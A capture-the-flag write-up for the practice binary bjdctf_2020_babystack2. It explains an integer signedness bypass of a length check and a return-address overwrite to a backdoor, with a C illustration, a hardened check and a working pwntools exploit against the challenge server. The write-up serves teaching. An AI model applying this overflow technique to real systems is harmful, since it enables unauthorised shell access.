BUU practice: bjdctf_2020_babystack2

Knowledge needed to solve this:
[[Integer signedness / unsigned integer overflow bugs]]
[[1. Basic ROP]]

Challenge information:

┌──(kali㉿kali)-[~/Desktop]
└─$ file bjdctf_2020_babystack2
bjdctf_2020_babystack2: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=98383c4b37ec43aae16b46971bd5ead3f03ce0a6, not stripped
                                                                                                    
┌──(kali㉿kali)-[~/Desktop]
└─$ checksec --file=bjdctf_2020_babystack2
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols    FORTIFY  Fortified       Fortifiable     FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   75) Symbols  No     0               1               bjdctf_2020_babystack2

Architecture: 64-bit
Protections: NX enabled, no stack canary, no PIE, Partial RELRO (from the checksec output above; no canary means a plain return-address overwrite is possible, no PIE means backdoor() has a fixed address, NX only matters if we wanted to run shellcode, which we do not)

Logic analysis:
Decompiled pseudocode:

__int64 backdoor()
{
  system("/bin/sh");
  return 1LL;
}

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[12]; // [rsp+0h] [rbp-10h] BYREF
  size_t nbytes; // [rsp+Ch] [rbp-4h] BYREF

  setvbuf(_bss_start, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 1, 0LL);
  LODWORD(nbytes) = 0;
  puts("**********************************");
  puts("*     Welcome to the BJDCTF!     *");
  puts("* And Welcome to the bin world!  *");
  puts("*  Let's try to pwn the world!   *");
  puts("* Please told me u answer loudly!*");
  puts("[+]Are u ready?");
  puts("[+]Please input the length of your name:");
  __isoc99_scanf("%d", &nbytes);
  if ( (int)nbytes > 10 )
  {
    puts("Oops,u name is too long!");
    exit(-1);
  }
  puts("[+]What's u name?");
  read(0, buf, (unsigned int)nbytes);
  return 0;
}

Analysis:
The length check compares nbytes with 10 as a signed int, so an integer signedness bug lets us pass the check with a negative number; the name is then read with a huge length, the stack buffer overflows, and we overwrite the return address to jump to the backdoor function and get a shell.
nbytes is declared as size_t, but only its low 4 bytes are used: the check is `(int)nbytes > 10` (signed), while the length handed to read() is `(unsigned int)nbytes` (unsigned).
So entering 0x80000001 (2147483649) works: as a signed int it is -2147483647, which is not greater than 10, while read() receives the unsigned value 2147483649. The script below simply sends -1, which passes the check the same way and gives read() a count of 0xffffffff (the kernel clamps oversized read counts, so the call still succeeds and copies however many bytes we send).
buf is only 12 bytes and sits at rbp-0x10, so 0x10 bytes of padding reach the saved rbp and 0x18 bytes reach the return address, which we overwrite with the address of backdoor (0x400726, fixed because the binary is not PIE).
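To make the type confusion concrete, here is an added C example (written for this page, not code from the challenge binary or the original writeup). It mirrors the vulnerable length check, shows the count read() would receive for several inputs, places a consistently typed check next to it, and builds the same 0x18-byte-filler-plus-address payload that the exploit script sends. The function names, the candidate inputs and the frame constants are this example's own assumptions, taken from the decompiled layout above.

```c
// Added example: reproduces the signedness bug in babystack2's length check
// and shows a check that uses one consistent type. Not code from the
// challenge binary; names and constants are assumptions for this illustration.
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 12                 /* char buf[12] at rbp-0x10 in the decompiled main */
#define BUF_TO_RBP 0x10             /* distance from buf to the saved rbp */
#define RET_OFFSET (BUF_TO_RBP + 8) /* saved rbp (8 bytes) then the return address: 0x18 */
#define BACKDOOR_ADDR 0x400726ULL   /* backdoor() from the writeup, fixed (no PIE) */

/* Mirror of the vulnerable check: the value is compared as a signed int. */
static bool vuln_length_accepted(int32_t nbytes) {
    return !(nbytes > 10);
}

/* The count read() actually receives after the cast to unsigned int. */
static uint32_t vuln_read_count(int32_t nbytes) {
    return (uint32_t)nbytes;
}

/* Hardened check: reject negatives and anything larger than the buffer. */
static bool safe_length_accepted(int32_t nbytes) {
    return nbytes >= 0 && nbytes <= 10 && nbytes <= BUF_SIZE;
}

/* Build the overflow payload: RET_OFFSET filler bytes, then the target
 * address little-endian (what pwntools' p64 does). Returns payload length,
 * or 0 if the output buffer is too small. */
static size_t build_payload(uint8_t *out, size_t cap, uint64_t target) {
    if (cap < RET_OFFSET + 8)
        return 0;
    memset(out, 'a', RET_OFFSET);
    for (int i = 0; i < 8; i++)
        out[RET_OFFSET + i] = (uint8_t)(target >> (8 * i));
    return RET_OFFSET + 8;
}

int main(void) {
    /* Constructed candidate inputs: two honest lengths, then the two bypass values
     * from the analysis (-1 and 0x80000001, written as INT32_MIN + 1). */
    int32_t candidates[] = {5, 11, -1, INT32_MIN + 1};
    for (size_t i = 0; i < sizeof candidates / sizeof candidates[0]; i++) {
        int32_t n = candidates[i];
        printf("nbytes=%11d  vuln check: %-6s  read count: %10u  safe check: %s\n",
               n,
               vuln_length_accepted(n) ? "pass" : "reject",
               vuln_read_count(n),
               safe_length_accepted(n) ? "pass" : "reject");
    }

    uint8_t payload[64];
    size_t len = build_payload(payload, sizeof payload, BACKDOOR_ADDR);
    printf("payload (%zu bytes): ", len);
    for (size_t i = 0; i < len; i++)
        printf("%02x", payload[i]);
    printf("\n");
    return 0;
}
```

Running it shows -1 and 0x80000001 passing the vulnerable check while read() would get 4294967295 and 2147483649 respectively, and the hardened check rejecting both; the printed payload is 24 bytes of 0x61 followed by 26 07 40 00 00 00 00 00, exactly what the script's `0x18*b'a'+p64(backdoor_addr)` produces.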

Exploit script:

from pwn import *
context(log_level='debug', arch='amd64', os='linux')

pwnfile = './bjdctf_2020_babystack2'
sh = remote('node4.buuoj.cn', 26524)
#sh = process(pwnfile)

backdoor_addr = 0x400726   # address of backdoor(); fixed because the binary is not PIE

# The length check is (int)nbytes > 10, so -1 passes it;
# read() then receives (unsigned int)-1 = 0xffffffff as its count.
sh.recvuntil(b"your name:\n")
sh.sendline(b'-1')

# buf is at rbp-0x10: 0x10 bytes reach the saved rbp, 8 more reach the
# return address, which we replace with the backdoor address.
sh.recvuntil(b"name?\n")
payload1 = b'a' * 0x18 + p64(backdoor_addr)
print(payload1)

#gdb.attach(sh)
#pause()

sh.sendline(payload1)

sh.interactive()

